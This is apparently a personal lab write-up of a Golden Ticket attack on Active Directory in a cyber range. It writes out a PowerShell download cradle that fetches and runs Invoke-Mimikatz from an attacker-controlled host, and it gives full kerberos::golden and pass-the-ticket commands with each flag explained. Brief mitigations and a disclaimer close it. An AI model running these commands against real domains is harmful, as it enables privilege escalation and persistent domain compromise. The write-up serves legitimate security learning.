Golden Ticket Attack
I have had the opportunity to work on my Windows attacking skills within a couple of different CyberRanges recently. I have been trying to understand the different use cases with Mimikatz and decided to share my experiences with a Golden Ticket Attack.
To start, a Golden Ticket is a post-exploitation attack that provides the ability for domain persistence. Meaning, the attacker has already compromised an account that has DcSync rights to the Active Directory Domain. Thus, being able to dump the krbtgt hash, as well as the domain SID, and use this information to create a forged Golden Ticket.
Prior to creating the Golden Ticket, I used the foothold system (WKS23) to test the local administrator account (pwn3d) credentials against the domain controller (DC01); which I validated that pwn3d did not have privileges to DC01.
Instead of copying Mimikatz to the foothold system, I used a PowerShell Download Cradle (from my Attacker system) to execute Mimikatz commands. The first command was to create the Golden Ticket and the second command was to inject the Golden Ticket.
iex (iwr http://192.168.23.206/Invoke-Mimikatz.ps1 -UseBasicParsing); Invoke-Mimikatz -Command ‘“kerberos::golden /admin:IDontExist23 /domain:plum.local /sid:S-1–5–21–XXXXXXXXX–XXXXXXXXXX–XXXXXXXXXX /krbtgt:<hash> id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080”’iex (iwr http://192.168.23.206/Invoke-Mimikatz.ps1 -UseBasicParsing); Invoke-Mimikatz -Command ‘“kerberos::ptt ticket.kirbi”’
Using the krbtgt hash and the domain SID, I created a Golden Ticket and saved it with the default name (ticket.kirbi) to the current working directory. I wanted to save the ticket for later use instead of immediately using PassTheTicket (PTT).
I used the following flags in order to not use the default ticket life-time of 10 years:
· /domain:plum.local — fully qualified domain name
· /sid:S-1–5–21-XXXXXXXX-XXXXXXXXXX-XXXXXXXXXX — domain SID
· /krbtgt:<hash> — domain krbtgt account hash
· /admin:IDontExist23 — fake account
· /id:500 — impersonate the Domain Administrator (RID 500)
· /groups:512 — assign the fake account permissions of the Domain Admins group
· /startoffset:0 — start time of when the ticket is available in minutes
· /endin:600 — life time of the ticket in minutes (600 = 10hrs)
· /renewmax:10080 — maximum life-time that the ticket can be renewed in minutes (10080 = 10 days)
With the ticket created and saved locally on WKS23, I used Mimikatz to inject the saved ticket and then validated that the ticket was created. Had I established a foothold to additional systems, I could have copied the Golden Ticket and injected it from those systems as well.
Next, I used Get-WmiObject and Net User to validate that the local Administrator account could access DC01 and validated that the fake user did not exist within LDAP.
- Resetting the krbtgt password (twice) to invalidate current golden tickets
- Review and filter Security Event ID 4624 and 4672
This article is made available for educational purposes only!!! In addition, this article provides general information on cyber security topics used for “Ethical Hacking”.
Persons accessing this information assume full responsibility for the use and agree to not use this content for any illegal purpose. Furthermore, the author is not liable for any direct or indirect damages or expense incurred which may result from the use of the information covered within this article.
Information within this article is “as is”, without warranty of any sort.